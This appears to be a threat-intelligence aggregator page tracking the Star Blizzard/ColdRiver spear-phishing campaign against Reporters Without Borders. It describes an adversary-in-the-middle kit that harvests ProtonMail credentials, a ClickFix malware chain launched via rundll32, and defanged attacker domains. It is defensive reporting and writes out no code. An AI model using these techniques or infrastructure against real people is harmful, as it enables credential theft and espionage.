Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

Coldriver intensified high-profile espionage campaign

Campaign
First reported
Last updated
Happening score
H score 39
1 unique sources, 2 articles

Summary

Hide ▲

Star Blizzard (ColdRiver/Calisto) continued a spear-phishing campaign in May and June 2025 against Reporters Without Borders (RSF) and another organization, using impersonated trusted contacts, compromised-website redirects, and a custom Adversary-in-the-Middle (AiTM) kit to harvest ProtonMail credentials and relay 2FA prompts. The activity fits the group’s long-running focus on Western entities backing Ukraine and shows continued use of credential harvesting tactics, including modified ProtonMail pages and attacker-controlled API handling for CAPTCHA and authentication.

Related Happenings

SHADOW-EARTH-053 China-aligned espionage campaign against Asian government and defense targets

Campaign
First: 01.05.2026 17:02 Last: 01.05.2026 17:02 Sources 1

About this happening: **SHADOW-EARTH-053** is running an active **China-aligned espionage campaign** against **government and defense** targets across **South, East, and Southeast Asia** and **Poland**...

Open Happening

UNC6783 BPO compromise campaign targeting downstream companies

Campaign
First: 09.04.2026 00:46 Last: 09.04.2026 00:46 Sources 1

About this happening: **UNC6783** is an active **BPO compromise campaign** targeting **business process outsourcers** and large enterprises to reach downstream environments for **extortion**. The opera...

Open Happening

Compromised legitimate WordPress websites used to infect visitors with infostealer malware campaign expands across multiple victims

Campaign
First: 11.03.2026 16:45 Last: 11.03.2026 16:45 Sources 1

About this happening: A **global ClickFix campaign** is abusing compromised **WordPress** sites to push **infostealer malware** to visitors, putting credentials and financial data at risk. The operatio...

Open Happening

CRESCENTHARVEST malicious .LNK espionage campaign targeting Iran protest supporters

Campaign
First: 19.02.2026 10:13 Last: 19.02.2026 10:13 Sources 1

About this happening: The **CRESCENTHARVEST** campaign is using **malicious .LNK files** and social engineering to target **supporters of Iran's ongoing protests** for **information theft** and **long-...

Open Happening

CANFAIL phishing campaign impersonating Ukrainian energy organizations

Campaign
First: 13.02.2026 19:27 Last: 13.02.2026 19:27 Sources 1

About this happening: A **previously undocumented threat actor** is running a **CANFAIL phishing campaign** that impersonates **Ukrainian energy organizations** to gain unauthorized access to email acc...

Open Happening

Timeline

  1. 03.12.2025 18:45 1 articles · 5mo ago

    Star Blizzard spear-phishing wave targets RSF and another organization

    Technical Analysis Update

    Star Blizzard, also known as ColdRiver or Calisto, was identified in a fresh spear-phishing wave against Reporters Without Borders (RSF) and another organization. The operators used impersonated trusted contacts, a custom Adversary-in-the-Middle (AiTM) kit on account.simpleasip[.]org, modified ProtonMail interface elements, and attacker-controlled API handling for CAPTCHA and two-factor authentication (2FA) to harvest credentials.

    Show sources
    Open in new tab
  2. 21.10.2025 13:02 2 articles · 7mo ago

    Coldriver shifts to NoRobot, YesRobot and MaybeRobot

    Initial Disclosure

    GTIG said Coldriver, also tracked as Star Blizzard, Callisto and UNC4057, had moved from LostKeys to a new malware chain built around NoRobot, YesRobot and MaybeRobot. The chain uses a ClickFix-style phishing lure, a fake CAPTCHA page, a malicious DLL launched via rundll32.exe, and downloads from inspectguarantee[.]org, while also reflecting a faster development and operations tempo in espionage operations against high-profile NGOs, former intelligence and military officers, and NATO governments.

    Show sources
    Open in new tab